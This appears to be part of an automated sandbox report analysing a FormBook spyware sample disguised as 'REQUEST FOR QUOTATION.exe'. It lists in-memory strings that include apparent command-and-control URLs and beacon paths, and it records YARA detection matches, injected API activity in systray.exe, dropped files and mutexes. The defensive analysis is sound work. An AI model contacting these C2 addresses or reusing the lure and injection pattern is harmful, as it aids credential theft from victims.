            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0
            Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/xxg/
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh0
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=16
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/?gws_rd=ssl
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/favicon.ico
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
            Source: systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=internationalsoccerteams.co

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            Detected FormBook malware
            Source: C:\Windows\SysWOW64\systray.exe | Dropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogri.ini
            Source: C:\Windows\SysWOW64\systray.exe | Dropped file: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogrv.ini
            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: REQUEST FOR QUOTATION.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_0041A060 NtClose
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_0041A110 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_00419F30 NtCreateFile
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_00419FE0 NtReadFile
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_0041A05A NtClose
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_0041A10A NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_00419EEA NtCreateFile
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_00419F2A NtCreateFile
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Code function: 5_2_00419F84 NtCreateFile, NtReadFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9540 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9560 NtWriteFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F95D0 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9770 NtSetInformationFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9610 NtEnumerateValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9650 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F96D0 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F96E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F99A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051FAD30 NtSetContextThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9520 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F95F0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051FA710 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9730 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051FA770 NtOpenThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9760 NtOpenProcess
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F97A0 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9670 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9950 NtQueueApcThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F99D0 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9820 NtEnumerateKey
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051FB040 NtSuspendThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F98A0 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F98F0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9B00 NtSetValueKey
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051FA3B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9A10 NtQuerySection
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9A00 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9A20 NtResumeThread
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_051F9A80 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0323A110 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0323A060 NtClose
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_03239F30 NtCreateFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_03239FE0 NtReadFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0323A10A NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0323A05A NtClose
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_03239F2A NtCreateFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_03239F84 NtCreateFile, NtReadFile
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_03239EEA NtCreateFile
            Source: C:\Windows\SysWOW64\systray.exe | String function: 051BB150 appears 54 times
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671960019.0000000006D10000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.666776546.0000000000F78000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671747910.0000000006C10000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.670861847.00000000058B0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710461060.00000000012AF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711571251.0000000001693000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamesystray.exej% vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe, 00000005.00000002.709469179.0000000000828000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe | Binary or memory string: OriginalFilenameISymbolReader.exe8 vs REQUEST FOR QUOTATION.exe
            Source: REQUEST FOR QUOTATION.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/9@8/3
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | File created: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Mutant created: \Sessions\1\BaseNamedObjects\uqQPXEaOhupEdXy
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp
            Source: REQUEST FOR QUOTATION.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
